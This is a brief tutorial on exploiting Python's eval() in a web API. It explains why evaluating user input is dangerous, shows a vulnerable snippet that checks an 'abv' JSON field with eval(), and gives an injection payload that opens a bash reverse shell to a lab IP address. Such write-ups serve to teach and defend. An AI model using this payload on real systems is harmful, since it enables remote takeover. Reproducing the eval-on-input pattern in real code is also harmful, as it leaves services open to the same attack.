/ web

Exploit eval() python fucntion

Why they're dangerous

eval() functions in Python are considered dangerous as this functions takes strings and turn them into executable code. They can be useful, especially if you are the one who controls the input.

However when a user is able to provide the input, eval() will execute anything that's feeded to it. A user could build a string where additional python code is executed, such as erasing all files on the system or spawning a reverse shell. Therefore, eval()should never be used to process user input.

example

Imagine a website with the following code:

# make sure the ABV value is sane.
        if eval('%s > 1' % request.json['abv']):
            return "ABV must be a decimal value less than 1.0", 400
        else:
            create_brew(request.json)
            return None, 201

In the python snippet above, we see that eval() is used to make sure the 'abv' value submitted by the user (via a JSON API) is less than 1.0.

Below is an example of POST API call the program would expect:

{"name":"test","brewer":"test", "style": "test", "abv":"0.1')"}

We can exploit this by sending the following POST request to the API, which would open a reverse shell to the device with ip 10.10.14.21 on port 7070.

{"name":"test","brewer":"test", "style": "test", "abv":"__import__('os').system('bash -i >& /dev/tcp/10.10.14.21/7070 0>&1")"}